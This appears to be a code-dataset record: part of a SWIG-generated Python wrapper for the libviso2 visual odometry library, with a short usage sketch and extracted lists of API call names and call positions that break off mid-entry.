__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
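# ---------------------------------------------------------------------------
# Minimal usage sketch (illustration only, not part of the SWIG-generated
# wrapper): it exercises only proxies defined above -- point2d, track and the
# std::vector wrappers -- and the numeric values are placeholders.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    p = point2d(3.0, 4.0)                       # Reconstruction::point2d
    print(p.u, p.v)

    t = track()                                 # empty Reconstruction::track
    t.first_frame, t.last_frame = 0, 5
    t.valid = True

    matches = MatchVector()                     # std::vector<Matcher::p_match>
    print(matches.empty(), matches.size())     # -> True 0

    points = Point3dVector(4)                   # pre-sized vector of point3d
    points.clear()

    tracks = TrackVector()
    tracks.reserve(8)
    print(tracks.capacity() >= 8)               # -> True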
| [
"_viso2.TrackVector_empty",
"_viso2.TrackVector_push_back",
"_viso2.TrackVector___delitem__",
"_viso2.MatchVector___getitem__",
"_viso2.MatchVector_pop_back",
"_viso2.SwigPyIterator_value",
"_viso2.Matrix_inv",
"_viso2.Point3dVector_clear",
"_viso2.new_MatchVector",
"_viso2.MatchVector_pop",
"_viso2.TrackVector___setitem__",
"_viso2.MatchVector___len__",
"_viso2.TrackVector_get_allocator",
"_viso2.VisualOdometry_getMotion",
"_viso2.new_point2d",
"_viso2.SwigPyIterator___eq__",
"_viso2.TrackVector___getslice__",
"_viso2.Matrix_svd",
"_viso2.Matrix_setMat",
"_viso2.Matrix_diag",
"_viso2.TrackVector___getitem__",
"_viso2.Point3dVector_empty",
"_viso2.VisualOdometry_getMatches",
"_viso2.new_VisualOdometryStereo",
"_viso2.SwigPyIterator_incr",
"_viso2.MatchVector_end",
"_viso2.MatchVector___setslice__",
"_viso2.TrackVector_pop",
"_viso2.Matrix_rotMatY",
"_viso2.Matrix_setVal",
"_viso2.Matcher_getMatches",
"_viso2.MatchVector___delslice__",
"_viso2.Matcher_matchFeatures",
"_viso2.Matrix_cross",
"_viso2.new_Matcher_parameters",
"_viso2.Matrix_setInverse",
"_viso2.Matrix_eye",
"_viso2.Matrix_reshape",
"_viso2.Matrix_setDiag",
"_viso2.Matrix_rotMatZ",
"_viso2.SwigPyIterator___iadd__",
"_viso2.MatchVector_swap",
"_viso2.TrackVector_iterator",
"_viso2.TrackVector_erase",
"_viso2.MatchVector_get_allocator",
"_viso2.Point3dVector___len__",
"_viso2.TrackVector_swap",
"_viso2.Matrix_det",
"_viso2.TrackVector_pop_back",
"_viso2.Point3dVector___nonzero__",
"_viso2.Matrix_toNumpy",
"_viso2.TrackVector_append",
"_viso2.VisualOdometryMono_getInlierMatches",
"_viso2.TrackVector_rbegin",
"_viso2.VisualOdometryStereo_process_frame",
"_viso2.MatchVector_assign",
"_viso2.MatchVector_capacity",
"_viso2.Point3dVector_back",
"_viso2.Point3dVector___delslice__",
"_viso2.new_VO_parameters",
"_viso2.Point3dVector_size",
"_viso2.Matrix_zero",
"_viso2.SwigPyIterator___next__",
"_viso2.Point3dVector_push_back",
"_viso2.VisualOdometry_getInlierIndices",
"_viso2.SwigPyIterator___add__",
"_viso2.Point3dVector_rend",
"_viso2.Reconstruction_getTracks",
"_viso2.TrackVector_resize",
"_viso2.VisualOdometry_getNumberOfInliers",
"_viso2.Point3dVector_capacity",
"_viso2.VisualOdometryMono_process",
"_viso2.Matrix___add__",
"importlib.import_module",
"_viso2.Matrix_identity",
"_viso2.MatchVector_push_back",
"_viso2.Matrix_assign",
"_viso2.Matrix_getMat",
"_viso2.TrackVector___setslice__",
"_viso2.Point3dVector___setitem__",
"_viso2.Matcher_setIntrinsics",
"_viso2.SwigPyIterator_copy",
"_viso2.MatchVector_size",
"_viso2.TrackVector_size",
"_viso2.Point3dVector___delitem__",
"_viso2.Point3dVector___getitem__",
"_viso2.Matrix___truediv__",
"_viso2.SwigPyIterator_equal",
"_viso2.new_track",
"_viso2.MatchVector_insert",
"_viso2.Point3dVector_rbegin",
"_viso2.Point3dVector_swap",
"_viso2.SwigPyIterator___isub__",
"_viso2.Point3dVector_pop",
"_viso2.VisualOdometry_process",
"_viso2.Matrix___mul__",
"_viso2.new_Matcher",
"_viso2.MatchVector_clear",
"_viso2.Point3dVector_resize",
"_viso2.SwigPyIterator___ne__",
"imp.load_module",
"_viso2.MatchVector___bool__",
"_viso2.Point3dVector_front",
"_viso2.TrackVector_assign",
"_viso2.Point3dVector_reserve",
"_viso2.new_Matrix",
"_viso2.MatchVector_reserve",
"_viso2.TrackVector___delslice__",
"_viso2.Matrix___neg__",
"_viso2.MatchVector_back",
"_viso2.Point3dVector_append",
"_viso2.MatchVector_rbegin",
"_viso2.new_TrackVector",
"_viso2.Point3dVector_pop_back",
"_viso2.TrackVector_end",
"_viso2.Point3dVector_get_allocator",
"_viso2.Matcher_bucketFeatures",
"_viso2.Matcher_pushBack",
"_viso2.Point3dVector___setslice__",
"_viso2.Point3dVector_insert",
"_viso2.Matrix_mean",
"_viso2.SwigPyIterator_previous",
"_viso2.Point3dVector_iterator",
"_viso2.new_Point3dVector",
"_viso2.TrackVector_reserve",
"_viso2.Matrix___invert__",
"_viso2.TrackVector_begin",
"_viso2.TrackVector_front",
"_viso2.Point3dVector___bool__",
"_viso2.Matrix_extractCols",
"_viso2.new_calibration",
"os.path.dirname",
"_viso2.MatchVector_empty",
"_viso2.new_VisualOdometryMono",
"_viso2.Matrix_solve",
"_viso2.VisualOdometry_getGain",
"_viso2.VisualOdometryStereo_process",
"_viso2.MatchVector___setitem__",
"_viso2.MatchVector_resize",
"_viso2.MatchVector_begin",
"_viso2.new_p_match",
"_viso2.SwigPyIterator_next",
"_viso2.Point3dVector_assign",
"_viso2.SwigPyIterator_decr",
"_viso2.MatchVector_front",
"_viso2.MatchVector___delitem__",
"_viso2.MatchVector___getslice__",
"_viso2.TrackVector___len__",
"_viso2.MatchVector_erase",
"_viso2.TrackVector___nonzero__",
"_viso2.Matrix_getData",
"_viso2.Matcher_getGain",
"_viso2.TrackVector___bool__",
"_viso2.Matrix_rotMatX",
"_viso2.MatchVector_rend",
"_viso2.Point3dVector___getslice__",
"_viso2.Reconstruction_getPoints",
"_viso2.new_point3d",
"_viso2.Reconstruction_update",
"_viso2.Matrix___sub__",
"_viso2.Matrix_l2norm",
"_viso2.TrackVector_insert",
"_viso2.TrackVector_rend",
"_viso2.MatchVector_iterator",
"_viso2.new_Stereo_parameters",
"_viso2.TrackVector_back",
"_viso2.Point3dVector_end",
"_viso2.VisualOdometry_getNumberOfMatches",
"_viso2.VisualOdometryMono_process_frame",
"_viso2.Point3dVector_erase",
"_viso2.TrackVector_clear",
"_viso2.new_Mono_parameters",
"_viso2.MatchVector_append",
"_viso2.new_bucketing",
"_viso2.Point3dVector_begin",
"_viso2.TrackVector_capacity",
"_viso2.Matrix___str__",
"_viso2.Matrix_lu",
"_viso2.SwigPyIterator_advance",
"_viso2.new_Reconstruction",
"_viso2.MatchVector___nonzero__",
"_viso2.SwigPyIterator_distance",
"_viso2.Reconstruction_setCalibration",
"_viso2.SwigPyIterator___sub__"
]
| [((26063, 26083), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (26080, 26083), False, 'import _viso2\n'), ((26151, 26172), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (26169, 26172), False, 'import _viso2\n'), ((26258, 26288), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (26279, 26288), False, 'import _viso2\n'), ((26370, 26398), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (26391, 26398), False, 'import _viso2\n'), ((26480, 26508), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (26501, 26508), False, 'import _viso2\n'), ((26590, 26618), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (26611, 26618), False, 'import _viso2\n'), ((26694, 26719), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (26713, 26719), False, 'import _viso2\n'), ((26785, 26805), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (26802, 26805), False, 'import _viso2\n'), ((3477, 3510), '_viso2.SwigPyIterator_value', '_viso2.SwigPyIterator_value', (['self'], {}), '(self)\n', (3504, 3510), False, 'import _viso2\n'), ((3656, 3691), '_viso2.SwigPyIterator_incr', '_viso2.SwigPyIterator_incr', (['self', 'n'], {}), '(self, n)\n', (3682, 3691), False, 'import _viso2\n'), ((3837, 3872), '_viso2.SwigPyIterator_decr', '_viso2.SwigPyIterator_decr', (['self', 'n'], {}), '(self, n)\n', (3863, 3872), False, 'import _viso2\n'), ((3962, 4001), '_viso2.SwigPyIterator_distance', '_viso2.SwigPyIterator_distance', (['self', 'x'], {}), '(self, x)\n', (3992, 4001), False, 'import _viso2\n'), ((4080, 4116), '_viso2.SwigPyIterator_equal', '_viso2.SwigPyIterator_equal', (['self', 'x'], {}), '(self, x)\n', (4107, 4116), False, 'import _viso2\n'), ((4197, 4229), '_viso2.SwigPyIterator_copy', '_viso2.SwigPyIterator_copy', (['self'], {}), '(self)\n', (4223, 4229), False, 'import _viso2\n'), ((4306, 4338), '_viso2.SwigPyIterator_next', '_viso2.SwigPyIterator_next', (['self'], {}), '(self)\n', (4332, 4338), False, 'import _viso2\n'), ((4423, 4459), '_viso2.SwigPyIterator___next__', '_viso2.SwigPyIterator___next__', (['self'], {}), '(self)\n', (4453, 4459), False, 'import _viso2\n'), ((4544, 4580), '_viso2.SwigPyIterator_previous', '_viso2.SwigPyIterator_previous', (['self'], {}), '(self)\n', (4574, 4580), False, 'import _viso2\n'), ((4673, 4711), '_viso2.SwigPyIterator_advance', '_viso2.SwigPyIterator_advance', (['self', 'n'], {}), '(self, n)\n', (4702, 4711), False, 'import _viso2\n'), ((4792, 4829), '_viso2.SwigPyIterator___eq__', '_viso2.SwigPyIterator___eq__', (['self', 'x'], {}), '(self, x)\n', (4820, 4829), False, 'import _viso2\n'), ((4910, 4947), '_viso2.SwigPyIterator___ne__', '_viso2.SwigPyIterator___ne__', (['self', 'x'], {}), '(self, x)\n', (4938, 4947), False, 'import _viso2\n'), ((5042, 5081), '_viso2.SwigPyIterator___iadd__', '_viso2.SwigPyIterator___iadd__', (['self', 'n'], {}), '(self, n)\n', (5072, 5081), False, 'import _viso2\n'), ((5176, 5215), '_viso2.SwigPyIterator___isub__', '_viso2.SwigPyIterator___isub__', (['self', 'n'], {}), '(self, n)\n', (5206, 5215), False, 'import _viso2\n'), ((5308, 5346), '_viso2.SwigPyIterator___add__', '_viso2.SwigPyIterator___add__', (['self', 'n'], {}), '(self, n)\n', (5337, 5346), False, 'import _viso2\n'), ((5499, 5541), '_viso2.SwigPyIterator___sub__', '_viso2.SwigPyIterator___sub__', (['self', '*args'], {}), '(self, *args)\n', (5528, 5541), False, 'import _viso2\n'), 
((6330, 6377), '_viso2.VisualOdometry_process', '_viso2.VisualOdometry_process', (['self', 'p_matched_'], {}), '(self, p_matched_)\n', (6359, 6377), False, 'import _viso2\n'), ((6460, 6497), '_viso2.VisualOdometry_getMotion', '_viso2.VisualOdometry_getMotion', (['self'], {}), '(self)\n', (6491, 6497), False, 'import _viso2\n'), ((6587, 6625), '_viso2.VisualOdometry_getMatches', '_viso2.VisualOdometry_getMatches', (['self'], {}), '(self)\n', (6619, 6625), False, 'import _viso2\n'), ((6727, 6773), '_viso2.VisualOdometry_getNumberOfMatches', '_viso2.VisualOdometry_getNumberOfMatches', (['self'], {}), '(self)\n', (6767, 6773), False, 'import _viso2\n'), ((6875, 6921), '_viso2.VisualOdometry_getNumberOfInliers', '_viso2.VisualOdometry_getNumberOfInliers', (['self'], {}), '(self)\n', (6915, 6921), False, 'import _viso2\n'), ((7060, 7104), '_viso2.VisualOdometry_getInlierIndices', '_viso2.VisualOdometry_getInlierIndices', (['self'], {}), '(self)\n', (7098, 7104), False, 'import _viso2\n'), ((7202, 7247), '_viso2.VisualOdometry_getGain', '_viso2.VisualOdometry_getGain', (['self', 'inliers_'], {}), '(self, inliers_)\n', (7231, 7247), False, 'import _viso2\n'), ((8421, 8445), '_viso2.new_calibration', '_viso2.new_calibration', ([], {}), '()\n', (8443, 8445), False, 'import _viso2\n'), ((9992, 10014), '_viso2.new_bucketing', '_viso2.new_bucketing', ([], {}), '()\n', (10012, 10014), False, 'import _viso2\n'), ((11469, 11495), '_viso2.new_VO_parameters', '_viso2.new_VO_parameters', ([], {}), '()\n', (11493, 11495), False, 'import _viso2\n'), ((12475, 12511), '_viso2.new_VisualOdometryMono', '_viso2.new_VisualOdometryMono', (['param'], {}), '(param)\n', (12504, 12511), False, 'import _viso2\n'), ((12981, 13027), '_viso2.VisualOdometryMono_process', '_viso2.VisualOdometryMono_process', (['self', '*args'], {}), '(self, *args)\n', (13014, 13027), False, 'import _viso2\n'), ((13129, 13177), '_viso2.VisualOdometryMono_getInlierMatches', '_viso2.VisualOdometryMono_getInlierMatches', (['self'], {}), '(self)\n', (13171, 13177), False, 'import _viso2\n'), ((13477, 13529), '_viso2.VisualOdometryMono_process_frame', '_viso2.VisualOdometryMono_process_frame', (['self', '*args'], {}), '(self, *args)\n', (13516, 13529), False, 'import _viso2\n'), ((15790, 15818), '_viso2.new_Mono_parameters', '_viso2.new_Mono_parameters', ([], {}), '()\n', (15816, 15818), False, 'import _viso2\n'), ((16818, 16856), '_viso2.new_VisualOdometryStereo', '_viso2.new_VisualOdometryStereo', (['param'], {}), '(param)\n', (16849, 16856), False, 'import _viso2\n'), ((17277, 17325), '_viso2.VisualOdometryStereo_process', '_viso2.VisualOdometryStereo_process', (['self', '*args'], {}), '(self, *args)\n', (17312, 17325), False, 'import _viso2\n'), ((17546, 17618), '_viso2.VisualOdometryStereo_process_frame', '_viso2.VisualOdometryStereo_process_frame', (['self', 'image1', 'image2', 'replace'], {}), '(self, image1, image2, replace)\n', (17587, 17618), False, 'import _viso2\n'), ((19627, 19657), '_viso2.new_Stereo_parameters', '_viso2.new_Stereo_parameters', ([], {}), '()\n', (19655, 19657), False, 'import _viso2\n'), ((20507, 20531), '_viso2.new_Matrix', '_viso2.new_Matrix', (['*args'], {}), '(*args)\n', (20524, 20531), False, 'import _viso2\n'), ((20804, 20833), '_viso2.Matrix_assign', '_viso2.Matrix_assign', (['self', 'M'], {}), '(self, M)\n', (20824, 20833), False, 'import _viso2\n'), ((21133, 21182), '_viso2.Matrix_getData', '_viso2.Matrix_getData', (['self', 'val_', 'i1', 'j1', 'i2', 'j2'], {}), '(self, val_, i1, j1, i2, j2)\n', (21154, 
